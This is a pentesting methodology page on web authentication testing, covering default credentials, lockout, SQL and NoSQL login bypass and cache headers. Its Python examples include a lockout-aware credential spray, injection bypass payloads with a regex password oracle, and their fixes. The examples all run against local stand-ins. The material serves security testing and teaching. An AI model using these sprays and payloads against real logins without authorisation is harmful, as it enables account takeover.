The Pentesting Guide

4.4 Authentication Testing

Last updated 5 months ago

4.4.1 Testing for Credentials Transported over an Encrypted Channel

Check that every form that carries credentials (login, registration, password change, password reset) is both loaded over HTTPS and submits to an HTTPS action; a login page served over HTTPS that posts to an http:// URL still leaks the password. Intercept the submission in Burp and confirm the username and password never travel in clear text, including on any redirect that happens after the POST. Note whether the host sends a Strict-Transport-Security header.

Evidence:

4.4.2 Testing for Default Credentials

Identify the product and version behind the login (see 4.1 Information Gathering) and look up its factory credentials in the default-password lists referenced at the end of this page. Load the candidate usernames and passwords into Burp Intruder as two payload sets and run a Cluster Bomb attack, which tries every username against every password. Sort the results by status code, response length or Location header to spot the combination that behaves differently. Application-level accounts (admin, administrator, test, guest, accounts created by the installer) get the same treatment even when the product has no documented defaults.

Evidence:

4.4.3 Testing for Weak Lock Out Mechanism

With an account you control, submit wrong passwords repeatedly and record whether and after how many attempts the account locks, how long the lock lasts, whether the counter resets on a successful login, and whether the lock can be sidestepped (different source IP, different capitalisation of the username, an alternative login endpoint). A lock that is too easy to trigger is also a finding, since it lets an attacker lock legitimate users out.

Evidence:
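The Cluster Bomb spray from 4.4.2 and the lockout check from 4.4.3, as an added example that is not part of this guide and not Burp's own code: a Python script that runs the same username x password grid with urllib against a fake login endpoint started inline (admin/admin left unchanged, accounts locked after five failures), orders the attempts so that each account is hit once per pass over the password list, and stops hitting an account as soon as the target reports it locked. The wordlists, the endpoint, the lockout threshold and the success signal (a 302 into the application) are all assumptions made for the example.

```python
"""Default-credential spray in Burp Intruder "Cluster Bomb" style, with
lockout detection, against a fake login started inline so it runs offline.
All names, lists and thresholds are assumptions made for this example."""
import itertools
import threading
import urllib.error
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

# Constructed wordlists. A real test takes them from the default-credential
# lists referenced on this page, trimmed to the product actually identified.
USERS = ["admin", "root", "tomcat"]
PASSWORDS = ["password", "admin", "tomcat", "123456"]
LOCKOUT_THRESHOLD = 5  # the fake target locks an account after this many failures


class FakeLogin(BaseHTTPRequestHandler):
    """Stand-in target: admin/admin was never changed, and each account is
    locked after LOCKOUT_THRESHOLD wrong passwords (counter kept on the server)."""
    valid = {"admin": "admin"}

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("username", [""])[0]
        password = form.get("password", [""])[0]
        failures = self.server.failures
        if failures.get(user, 0) >= LOCKOUT_THRESHOLD:
            self._reply(403, b"Account locked")
        elif self.valid.get(user) == password:
            self.send_response(302)  # success: redirect into the application
            self.send_header("Location", "/dashboard")
            self.send_header("Content-Length", "0")
            self.end_headers()
        else:
            failures[user] = failures.get(user, 0) + 1
            self._reply(200, b"Invalid username or password")

    def _reply(self, code, body):
        self.send_response(code)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the fake target quiet
        pass


class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow redirects: the 302 itself is what we classify on."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def start_fake_target():
    """Start the fake login on an ephemeral port; returns (server, login_url)."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), FakeLogin)
    srv.failures = {}
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}/login"


def attempt(url, user, password):
    """One login POST. Returns (status, body) without following redirects."""
    data = urllib.parse.urlencode({"username": user, "password": password}).encode()
    req = urllib.request.Request(url, data=data, method="POST")
    try:
        with urllib.request.build_opener(NoRedirect()).open(req, timeout=5) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:  # urllib raises on 3xx/4xx; we want those too
        return err.code, err.read()


def cluster_bomb(url, users, passwords):
    """Try every user x password pair, password-major: each account gets one
    attempt per pass over the password list, the slowest approach to a
    per-account lockout threshold. Locked and already-cracked accounts are
    skipped. Returns (hits, locked_accounts)."""
    hits, locked = [], set()
    for password, user in itertools.product(passwords, users):
        if user in locked or any(user == u for u, _ in hits):
            continue
        status, body = attempt(url, user, password)
        if status == 403 and b"locked" in body.lower():
            locked.add(user)
        elif status == 302:  # this fake target redirects on success; confirm on the real one
            hits.append((user, password))
    return hits, locked


def probe_lockout(url, user, max_attempts):
    """4.4.3: send wrong passwords to one account and return the attempt number
    at which the target first reports a lock, or None if it never does."""
    for n in range(1, max_attempts + 1):
        status, body = attempt(url, user, f"definitely-wrong-{n}")
        if status == 403 and b"locked" in body.lower():
            return n
    return None


if __name__ == "__main__":
    srv, url = start_fake_target()
    print("valid credentials, locked accounts:", cluster_bomb(url, USERS, PASSWORDS))
    print("lock reported on attempt:", probe_lockout(url, "guest", 10))
    srv.shutdown()
```

Intruder's Cluster Bomb iterates payload position 1 fastest, so putting the username list in position 1 and the password list in position 2 gives the same password-major order as the script; with the lists the other way round every password is tried against the first account before the second account is touched, and the first account locks early. Decide what the real target's success response looks like (redirect, Set-Cookie, response length) before spraying, and keep the attempt log: the number of the attempt at which a lock appears is the 4.4.3 evidence.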
4.4.4 Testing for Bypassing Authentication Schema

Try to break the authentication process in order to obtain a valid session ID, and try to bypass the authentication mechanism in every section of the site that requires some sort of authentication, with the following techniques:

  • Direct page request: access the URL of a protected page directly without any session cookie set. The Autorize Burp extension (referenced at the end of this page) can replay every request you make with the cookies stripped and flag the responses that still return the authenticated content.
  • SQL or NoSQL injection in the login form: submit the payloads from the SQLi auth-bypass list and the NoSQL injection list referenced at the end of this page in the username and password fields, and look for a response that logs you in without valid credentials.

Evidence:
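The two injection techniques listed above, as an added example that is constructed here and is not taken from this guide or from the referenced payload lists: a vulnerable SQL login and its parameterised fix, backed by an in-memory SQLite table, and a vulnerable NoSQL-style login that passes the JSON body straight into the query filter, next to a version that enforces string types. The user records, the small set of query operators the toy matcher understands and the payloads are assumptions for the example.

```python
"""SQL and NoSQL authentication bypass: the vulnerable login next to its
fixed form. The user records, the SQLite table and the toy document matcher
are constructed for this example and stand in for a real backend."""
import re
import sqlite3

# Constructed user store. A real target would hash passwords; that is
# irrelevant to the bypass, which never needs to know a password at all.
USER_DOCS = [
    {"username": "admin", "password": "S3cret!Pw"},
    {"username": "alice", "password": "hunter2"},
]


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?)",
                   [(d["username"], d["password"]) for d in USER_DOCS])
    return db


def sql_login_vulnerable(db, username, password):
    """Input pasted into the statement: admin'-- comments out everything after
    the username check, ' OR '1'='1 makes the whole WHERE clause true."""
    stmt = (f"SELECT username FROM users WHERE username = '{username}' "
            f"AND password = '{password}'")
    row = db.execute(stmt).fetchone()
    return row[0] if row else None


def sql_login_fixed(db, username, password):
    """Parameterised: values travel separately from the statement, so they
    can never change its structure. The same payloads are now just strings."""
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None


def _matches(value, cond):
    """Subset of MongoDB query operators, enough to show why handing the JSON
    body to a filter is dangerous. Unknown operators never match."""
    if not isinstance(cond, dict):
        return value == cond
    checks = {
        "$ne": lambda v, a: v != a,
        "$gt": lambda v, a: v > a,
        "$regex": lambda v, a: re.search(a, v) is not None,
    }
    return all(op in checks and checks[op](value, arg) for op, arg in cond.items())


def nosql_login_vulnerable(body):
    """Equivalent of users.findOne({username: req.body.username,
    password: req.body.password}) on a JSON body: an object such as
    {"$ne": ""} in place of the password is honoured as an operator."""
    query = {"username": body.get("username"), "password": body.get("password")}
    for doc in USER_DOCS:
        if all(_matches(doc[field], cond) for field, cond in query.items()):
            return doc["username"]
    return None


def nosql_login_fixed(body):
    """Reject anything that is not a plain string before it reaches the query.
    The same check is needed for URL-encoded bodies like password[$ne]=."""
    username, password = body.get("username"), body.get("password")
    if not isinstance(username, str) or not isinstance(password, str):
        return None
    return nosql_login_vulnerable({"username": username, "password": password})


if __name__ == "__main__":
    db = make_db()
    print(sql_login_vulnerable(db, "admin'--", "anything"))    # admin
    print(sql_login_vulnerable(db, "nobody", "' OR '1'='1"))   # admin
    print(sql_login_fixed(db, "admin'--", "anything"))         # None
    print(nosql_login_vulnerable({"username": "admin", "password": {"$ne": ""}}))  # admin
    print(nosql_login_fixed({"username": "admin", "password": {"$ne": ""}}))       # None
```

The $regex operator is worth keeping in the payload set even when $ne already logs you in: sent against the fixed username, a pattern such as ^S matches or fails depending on the stored password's first character, which turns the login form into a character-by-character password oracle.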
4.4.5 Testing for Vulnerable Remember Password

If the application offers a "remember me" option, log in with it enabled and inspect what is stored on the client. The cookie (or local storage entry) must not contain the password in clear or reversibly encoded form, and the persistent token must be long, random, bound to an expiry, and revoked on logout and on password change.

Evidence:

4.4.6 Testing for Browser Cache Weaknesses

Log in, browse to pages that show sensitive data, log out and press the browser back button: the page must not be served from the cache. Then confirm that every response carrying sensitive data sends all three headers below, so that HTTP/1.1 caches, HTTP/1.0 caches and the browser's own cache all refuse to store it:

Cache-Control: no-cache, no-store
Expires: 0
Pragma: no-cache

Evidence:
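A check for the three headers above, as an added example that is not from this guide: a Python function that audits one response's headers, whether captured from Burp or fetched with any client, and reports each way the page could still be cached, including Cache-Control values that say private or max-age instead of no-store, a missing Pragma, and an Expires date that lies in the future. The sample responses are constructed.

```python
"""Audit of anti-caching headers on authenticated responses. Pure functions
over header dicts, so they work on responses saved from Burp as well as on
ones fetched live. The sample responses are constructed for this example."""
import email.utils
from datetime import datetime, timezone

REQUIRED_DIRECTIVES = ("no-store", "no-cache")

SAMPLE_RESPONSES = [  # constructed, not captured from any real site
    ("/account", {"Cache-Control": "no-cache, no-store, must-revalidate",
                  "Pragma": "no-cache", "Expires": "0"}),
    ("/statement.pdf", {"Cache-Control": "private, max-age=600",
                        "Expires": "Wed, 21 Oct 2099 07:28:00 GMT"}),
    ("/profile", {"Cache-Control": "public"}),
]


def parse_cache_control(value):
    """'no-store, Max-Age=0, private' -> {'no-store': None, 'max-age': '0', 'private': None}."""
    directives = {}
    for part in (value or "").split(","):
        name, _, arg = part.strip().lower().partition("=")
        if name:
            directives[name.strip()] = arg.strip().strip('"') or None
    return directives


def expires_in_future(value):
    """True only for a parseable Expires date that lies ahead. Caches treat
    unparseable values such as 0 or -1 as already expired, so those are fine."""
    try:
        when = email.utils.parsedate_to_datetime(value)
    except (TypeError, ValueError):
        return False
    if when.tzinfo is None:
        when = when.replace(tzinfo=timezone.utc)
    return when > datetime.now(timezone.utc)


def audit_cache_headers(headers):
    """Findings for one response that carries sensitive data. An empty list
    means Cache-Control, Pragma and Expires all agree it must not be stored,
    by HTTP/1.1 caches, HTTP/1.0 caches and the browser alike."""
    h = {k.lower(): v for k, v in headers.items()}
    cc = parse_cache_control(h.get("cache-control"))
    findings = []
    for directive in REQUIRED_DIRECTIVES:
        if directive not in cc:
            findings.append(f"Cache-Control missing '{directive}'")
    if cc.get("max-age") not in (None, "0"):
        findings.append(f"Cache-Control allows reuse for {cc['max-age']} seconds")
    if "public" in cc:
        findings.append("Cache-Control: public on an authenticated response")
    if h.get("pragma", "").strip().lower() != "no-cache":
        findings.append("Pragma: no-cache missing (HTTP/1.0 caches ignore Cache-Control)")
    if "expires" not in h:
        findings.append("Expires header missing")
    elif expires_in_future(h["expires"]):
        findings.append(f"Expires lies in the future: {h['expires']}")
    return findings


def audit_responses(responses):
    """{url: findings} for every response that is not safely non-cacheable."""
    report = {}
    for url, headers in responses:
        findings = audit_cache_headers(headers)
        if findings:
            report[url] = findings
    return report


if __name__ == "__main__":
    for url, findings in audit_responses(SAMPLE_RESPONSES).items():
        print(url)
        for line in findings:
            print("  -", line)
```

Cache-Control: private on its own is a common false comfort: it only stops shared caches, and the browser cache on a shared workstation is exactly the one the back button reads from, so it is reported as missing no-store like any other value.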
4.4.7 Testing for Weak Password Policy

Read the policy the application enforces on registration and password change (minimum and maximum length, character classes, reuse of previous passwords, rotation period) and then try to violate it: set a password equal to the username, a dictionary word, or one shorter than the stated minimum, and check whether a long password is silently truncated before it is stored.

Evidence:

4.4.8 Testing for Weak Security Question Answer

Where security questions back the password reset, check whether the questions come from a fixed set or are user-chosen, whether the answers are easy to guess or to find through OSINT (mother's maiden name, first school, favourite colour), and whether the answer can be brute forced without any lockout.

Evidence:

4.4.9 Testing for Weak Password Change or Reset Functionalities

Check that changing a password requires the current one, that the reset flow does not reveal whether an account exists, and that reset tokens are random, single-use and short-lived. Look for a user identifier in the reset request or link that the client can swap for another account, test whether the reset link can be pointed at a host you control (see Host Header Injection under Exploitation), and confirm that existing sessions are terminated once the password changes.

Evidence:

4.4.10 Testing for Weaker Authentication in Alternative Channel

List every other way to reach the same functionality (mobile app, API, legacy or test subdomain, an older version of the site, an HTTP-only or simplified interface) and repeat the tests above against each of them; an alternative channel that skips lockout, the password policy or a second factor is a finding.

Evidence:

Resources

Testing for Default Credentials:
  • Cirt - Default passwords
  • SecLists - Default Credentials
  • Passwords Database
  • Data Recovery - Default Passwords
  • DefaultCreds Cheat Sheet
  • Small Test

Testing for Bypassing Authentication Schema:
  • Autorize (Burp extension)
  • SQLi_Auth_Bypass-Master_List.txt
  • NoSQL injection payloads